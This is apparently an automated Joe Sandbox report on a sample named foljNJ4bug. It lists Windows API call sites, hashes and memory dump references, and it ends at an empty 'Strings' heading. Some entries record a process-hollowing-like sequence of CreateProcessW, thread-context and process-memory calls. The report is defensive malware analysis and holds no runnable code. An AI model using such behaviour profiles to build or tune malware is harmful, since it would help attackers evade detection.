                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ByteCharMultiWide$_sprintf_strcat_strlen_wcslen
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3199840319-0
                                                                                                                                              • Opcode ID: 49a3294527d5b305cfbd6c685c74412098d504eb7a2552fd7b1e5b305baf6987
                                                                                                                                              • Instruction ID: aac9d08775c2cbfae45fd546c2dd5c585d34072f6b495fb7426f91ad36779b1c
                                                                                                                                              • Opcode Fuzzy Hash: 49a3294527d5b305cfbd6c685c74412098d504eb7a2552fd7b1e5b305baf6987
                                                                                                                                              • Instruction Fuzzy Hash: 7B2148B260825027D724EF3A9C82A6EF2D4AF85304F14893FF555C22C2F738D554879A
                                                                                                                                              APIs
                                                                                                                                              • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,0040DE74,?,00000001,?,00403423,?), ref: 0040F13A
                                                                                                                                              • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,0040DE74,?,00000001,?,00403423,?), ref: 00426326
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateFile
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 823142352-0
                                                                                                                                              • Opcode ID: 01c8104855b6be3cf9f3f51c38ffad3c9237c0860841684a852cd2675ef3d23e
                                                                                                                                              • Instruction ID: 8a88c5525f76e0b0fff62cf48ad84dc7055e673dbb4ccc29545257d8619b8f55
                                                                                                                                              • Opcode Fuzzy Hash: 01c8104855b6be3cf9f3f51c38ffad3c9237c0860841684a852cd2675ef3d23e
                                                                                                                                              • Instruction Fuzzy Hash: 16011D70784310BAF2305A68DD0BF5266546B45B24F20473ABBE5BE2D1D2F86885870C
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                                                                                              • __lock_file.LIBCMT ref: 00414A8D
                                                                                                                                                • Part of subcall function 00415471: __lock.LIBCMT ref: 00415496
                                                                                                                                              • __fclose_nolock.LIBCMT ref: 00414A98
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2800547568-0
                                                                                                                                              • Opcode ID: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                                                                                                                                              • Instruction ID: d9443fdd3ee0a3059f5d17ec53abbfe2105cc8a5d10ddad395bff0ae1f283336
                                                                                                                                              • Opcode Fuzzy Hash: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                                                                                                                                              • Instruction Fuzzy Hash: EEF0F6308417019AD710AB7588027EF37A09F41379F22864FA061961D1C73C85C29B5D
                                                                                                                                              APIs
                                                                                                                                              • __lock_file.LIBCMT ref: 00415012
                                                                                                                                              • __ftell_nolock.LIBCMT ref: 0041501F
                                                                                                                                                • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: __ftell_nolock__getptd_noexit__lock_file
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2999321469-0
                                                                                                                                              • Opcode ID: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                                                                                                                                              • Instruction ID: e3e7bc223609ce985a1750c66bb322057640979a4505571362f253753ce4bf01
                                                                                                                                              • Opcode Fuzzy Hash: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                                                                                                                                              • Instruction Fuzzy Hash: 64F03030900605EADB107FB5DD027EE3B70AF443A8F20825BB0259A0E1DB7C8AC29A59
                                                                                                                                              APIs
                                                                                                                                              • CreateProcessW.KERNELBASE(?,00000000), ref: 04038A8B
                                                                                                                                              • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 04038B21
                                                                                                                                              • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 04038B43
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2158942596.0000000004037000.00000040.00000020.00020000.00000000.sdmp, Offset: 04037000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_4037000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2438371351-0
                                                                                                                                              • Opcode ID: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                                                                                                                                              • Instruction ID: 1b7f889fa92361337f92c07cc7dd89750f7c604fa3c252392d7b600bf18dea21
                                                                                                                                              • Opcode Fuzzy Hash: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                                                                                                                                              • Instruction Fuzzy Hash: 2712EE24E24658C6EB24DF60D8507DEB272EF68301F1090E9910DEB7A4E77A5F81CF5A
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: _memmove
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4104443479-0
                                                                                                                                              • Opcode ID: 224a1bccd0668171228bffd00b4e167e84225026459a60d9317a1c29c8a59c26
                                                                                                                                              • Instruction ID: 6397ebbfaf442e519c955e074037b65107783079284990db5ef0c3dd021860ed
                                                                                                                                              • Opcode Fuzzy Hash: 224a1bccd0668171228bffd00b4e167e84225026459a60d9317a1c29c8a59c26
                                                                                                                                              • Instruction Fuzzy Hash: 36317371E00209EBDF009F52E9866AEFBF4FF40740F2189BED855E2650E7389990D759
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 544645111-0
                                                                                                                                              • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                              • Instruction ID: 21b87f0337b3904faf2e49e7d89a80b8c5538d611ad57d97d778efbd48141229
                                                                                                                                              • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                              • Instruction Fuzzy Hash: 8131F770A00105DBC718DF88E590AAAF7B1FB49310B6486A6E409CF355DB78EDC1CBD9
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: e5559574dc10eca8e97d8025a500eef8ee7d185e3c773571fee143e03780f234
                                                                                                                                              • Instruction ID: 427b4a632c312742ac0951887501238d3178a51c37fde1d0fd35c98815df3d2a
                                                                                                                                              • Opcode Fuzzy Hash: e5559574dc10eca8e97d8025a500eef8ee7d185e3c773571fee143e03780f234
                                                                                                                                              • Instruction Fuzzy Hash: 21119674200201ABDB249F36D984E26B3A5AF45304B244D2FF9C5D7790DB7CE881DB5E
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 35b7bc891c26268d2cb6d46035521dde4ecfc0337a7d2d2d45483da740e67eee
                                                                                                                                              • Instruction ID: fe3c5e01fee558804f1d0cd68762aa03bf47037873853bda5dcd607d85013340
                                                                                                                                              • Opcode Fuzzy Hash: 35b7bc891c26268d2cb6d46035521dde4ecfc0337a7d2d2d45483da740e67eee
                                                                                                                                              • Instruction Fuzzy Hash: 2D118B352046019FDB10DF69D884E96B3E9AF8A314F14856EFD298B362CB35FC41CB95
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                              • _memmove.LIBCMT ref: 00444B34
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: _malloc_memmove
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1183979061-0
                                                                                                                                              • Opcode ID: 5456aa698ccb66e472ad2dc6bdf94112e2600af6ff6d776df7a489d92d6f0097
                                                                                                                                              • Instruction ID: 1ab6fe9f530497837eb86deb75815884a9af672873ccf792f11a5e6f6739e6df
                                                                                                                                              • Opcode Fuzzy Hash: 5456aa698ccb66e472ad2dc6bdf94112e2600af6ff6d776df7a489d92d6f0097
                                                                                                                                              • Instruction Fuzzy Hash: E0016D3220410AAFD714DF2CC882DA7B3EDEF88318711492FE996C7251EA74F9508B94
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: __lock_file
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3031932315-0
                                                                                                                                              • Opcode ID: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
                                                                                                                                              • Instruction ID: 324047821ed349453e17c5e7f52af34d31ade4ebcb64e32b23ce3c6ad3b356a0
                                                                                                                                              • Opcode Fuzzy Hash: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
                                                                                                                                              • Instruction Fuzzy Hash: FF011E71801219EBCF21AFA5C8028DF7B71AF44764F11851BF824551A1E7398AE2DBD9
                                                                                                                                              APIs
                                                                                                                                              • WriteFile.KERNELBASE(?,?,?,?,00000000,?,?,?,004263D0,?,00487ACC,00000003,0040DE90,?,?,00000001), ref: 00443E54
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FileWrite
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3934441357-0
                                                                                                                                              • Opcode ID: 873a582ac05df194872d3361efdc1b64d97226b1633050e8059638026df5ad0f
                                                                                                                                              • Instruction ID: f8d6e32d6ecef3e6c51c5ea05c7ff41eb941b2b6d152ec47b845c679c5cedb0e
                                                                                                                                              • Opcode Fuzzy Hash: 873a582ac05df194872d3361efdc1b64d97226b1633050e8059638026df5ad0f
                                                                                                                                              • Instruction Fuzzy Hash: 6BE01276100318ABDB10DF98D844FDA77BCEF48765F10891AFA048B200C7B4EA908BE4
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: __wfsopen
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 197181222-0
                                                                                                                                              • Opcode ID: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                                                                                                                                              • Instruction ID: b34ddb7a850719c89311ce964fc9f65e9e9400c6a390d5c1cbb008c3125e494a
                                                                                                                                              • Opcode Fuzzy Hash: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                                                                                                                                              • Instruction Fuzzy Hash: 82C092B244020C77CF112A93EC02F9A3F1E9BC0764F058021FB1C1A162AA77EAA19689
                                                                                                                                              APIs
                                                                                                                                              • CloseHandle.KERNELBASE(?,?,00426FBF), ref: 0040DA3D
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CloseHandle
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2962429428-0
                                                                                                                                              • Opcode ID: 4893ac657bcef9b9334a0355bd28ce0f0291ef024a1c9f1561977d8c5be9d70a
                                                                                                                                              • Instruction ID: 552ddd844a8bbede063c80161f66c4637379340f91e2bb70a518b226642b2913
                                                                                                                                              • Opcode Fuzzy Hash: 4893ac657bcef9b9334a0355bd28ce0f0291ef024a1c9f1561977d8c5be9d70a
                                                                                                                                              • Instruction Fuzzy Hash: B9E045B4A04B008BC6308F5BE444416FBF8EEE46203108E1FD4A6C2A64C3B4A1498F50
                                                                                                                                              APIs
                                                                                                                                              • Sleep.KERNELBASE(000001F4), ref: 040392E1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2158942596.0000000004037000.00000040.00000020.00020000.00000000.sdmp, Offset: 04037000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_4037000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Sleep
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3472027048-0
                                                                                                                                              • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                                              • Instruction ID: c23e35617943be987ad6a30a3771bfb91c1461cbaa6ff211f829bf90936779da
                                                                                                                                              • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                                              • Instruction Fuzzy Hash: 30E0E67494010EDFDB00EFB4D54969E7FB4EF04302F100561FD01E2280DA709D508A62
                                                                                                                                              APIs
                                                                                                                                              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C8E1
                                                                                                                                              • DefDlgProcW.USER32(?,0000004E,?,?), ref: 0047C8FC
                                                                                                                                              • GetKeyState.USER32(00000011), ref: 0047C92D
                                                                                                                                              • GetKeyState.USER32(00000009), ref: 0047C936
                                                                                                                                              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C949
                                                                                                                                              • GetKeyState.USER32(00000010), ref: 0047C953
                                                                                                                                              • GetWindowLongW.USER32(00000002,000000F0), ref: 0047C967
                                                                                                                                              • SendMessageW.USER32(00000002,0000110A,00000009,00000000), ref: 0047C993
                                                                                                                                              • SendMessageW.USER32(00000002,0000113E,00000000,?), ref: 0047C9B6
                                                                                                                                              • _wcsncpy.LIBCMT ref: 0047CA29
                                                                                                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0047CA5A
                                                                                                                                              • SendMessageW.USER32 ref: 0047CA7F
                                                                                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 0047CADF
                                                                                                                                              • SendMessageW.USER32(?,00001030,?,0047EA68), ref: 0047CB84
                                                                                                                                              • ImageList_SetDragCursorImage.COMCTL32(00AFF7A8,00000000,00000000,00000000), ref: 0047CB9B
                                                                                                                                              • ImageList_BeginDrag.COMCTL32(00AFF7A8,00000000,000000F8,000000F0), ref: 0047CBAC
                                                                                                                                              • SetCapture.USER32(?), ref: 0047CBB6
                                                                                                                                              • ClientToScreen.USER32(?,?), ref: 0047CC17
                                                                                                                                              • ImageList_DragEnter.COMCTL32(00000000,?,?,?,?), ref: 0047CC26
                                                                                                                                              • ReleaseCapture.USER32 ref: 0047CC3A
                                                                                                                                              • GetCursorPos.USER32(?), ref: 0047CC72
                                                                                                                                              • ScreenToClient.USER32(?,?), ref: 0047CC80
                                                                                                                                              • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CCE6
                                                                                                                                              • SendMessageW.USER32 ref: 0047CD12
                                                                                                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CD53
                                                                                                                                              • SendMessageW.USER32 ref: 0047CD80
                                                                                                                                              • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0047CD99
                                                                                                                                              • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0047CDAA
                                                                                                                                              • GetCursorPos.USER32(?), ref: 0047CDC8
                                                                                                                                              • ScreenToClient.USER32(?,?), ref: 0047CDD6
                                                                                                                                              • GetParent.USER32(00000000), ref: 0047CDF7
                                                                                                                                              • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CE60
                                                                                                                                              • SendMessageW.USER32 ref: 0047CE93
                                                                                                                                              • ClientToScreen.USER32(?,?), ref: 0047CEEE
                                                                                                                                              • TrackPopupMenuEx.USER32(?,00000000,?,?,03011B60,00000000,?,?,?,?), ref: 0047CF1C
                                                                                                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CF46
                                                                                                                                              • SendMessageW.USER32 ref: 0047CF6B
                                                                                                                                              • ClientToScreen.USER32(?,?), ref: 0047CFB5
                                                                                                                                              • TrackPopupMenuEx.USER32(?,00000080,?,?,03011B60,00000000,?,?,?,?), ref: 0047CFE6
                                                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 0047D086
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
